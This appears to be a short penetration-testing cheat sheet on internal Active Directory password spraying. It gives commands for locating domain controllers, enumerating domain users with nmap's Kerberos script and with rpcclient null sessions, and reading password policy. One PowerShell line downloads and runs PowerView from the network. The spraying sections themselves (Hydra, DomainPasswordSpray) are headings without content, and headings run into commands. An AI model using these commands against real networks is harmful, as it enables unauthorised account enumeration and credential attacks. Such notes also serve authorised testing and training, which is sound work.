Internal Password Spraying
Internal Password Spraying
Get domain users using Kerberos
dig _ldap._tcp.dc._msdcs.Domain_Name // Find Domain Controller
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=users.txt 10.196.1.13Get domain users using powerview
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1");
Get-DomainUser | select samaccountname > users.txtGet domain users using rpcclient
nmap -Pn -sS -p389,88 --open 10.10.0.0/16 // Find Domain Controller
rpcclient -U "" -N 10.10.1.50 // Authenticate Using Null Session
rpcclient -U "MEGA\hsaad" 10.10.1.50 // Authenticate Using Domain User & Password
>> enumdomusers // Enumerate All Domain UsersGet domain password policy using powerview
(Get-DomainPolicy)."SystemAccess"Get domain password policy using rpcclient
>> getdompwinfoPassword Spraying Using Hydra
Password Spraying Using DomainPasswordSpray
Common Passwords
Last updated